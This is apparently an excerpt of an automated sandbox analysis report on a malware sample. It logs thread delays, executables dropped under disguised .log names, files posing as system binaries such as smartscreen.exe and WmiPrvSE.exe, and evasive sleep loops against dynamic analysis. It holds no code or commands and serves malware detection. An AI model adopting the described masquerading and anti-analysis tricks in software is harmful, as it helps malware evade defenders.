Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566420
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566281
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566141
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565816
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565702
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565509
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565406
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565199
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565014
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564781
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564669
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564560
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564452
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564343
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563683
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563341
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 562002
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561887
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561438
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561328
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561157
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561047
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560934
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560817
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560703
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560585
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559757
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Window / User API: threadDelayed 653 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1649 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1712 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1558 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1462
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1957
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1703
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1660
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1979
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window / User API: threadDelayed 858
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window / User API: threadDelayed 4484
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window / User API: threadDelayed 3467
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2103
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2087
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2269
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1867
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2042
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2012
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2423
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fTGLCVSM.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\stDzyxQe.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yuQrGMvY.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uDZAyPvf.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PwjnMVKl.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gUHludjC.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fcdLmHlJ.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rreJQTki.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ttRrlCpd.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ylgZbdUT.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EhviVOkL.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aceLSxeO.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KIRpkYvx.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FNQYcsFE.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WyUWCOVc.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QyIevzpi.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hILtgrfA.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VoMNpBPa.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DhiqiJKM.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wjuqGuQY.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VWRNVcdg.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RGFoMnqm.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bmmUfKkQ.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nGlBWAAq.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IUzpLFaA.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ArFrORkS.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sBnSdgqk.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qDaBeGpk.log Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 6176 Thread sleep time: -193000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -598469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -597942s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99636s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99070s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98929s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98782s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98657s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98530s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595529s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 320 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8572 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep count: 1649 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 Thread sleep count: 1712 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 Thread sleep count: 1558 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8384 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep count: 1462 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep count: 1551 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep count: 2008 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep count: 1957 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 1912 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 1703 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 Thread sleep count: 1660 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep count: 1970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 Thread sleep count: 1979 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8388 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8076 Thread sleep time: -858000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8416 Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -598984s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -598672s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -597906s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -597078s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -596641s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -596067s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -595375s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -595062s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9928 Thread sleep time: -3600000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -594234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -593780s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -593234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -592891s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -592516s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -591859s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -591500s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -591156s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -590859s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -590172s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589953s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589750s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589516s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589153s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588922s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588748s >= -30000s
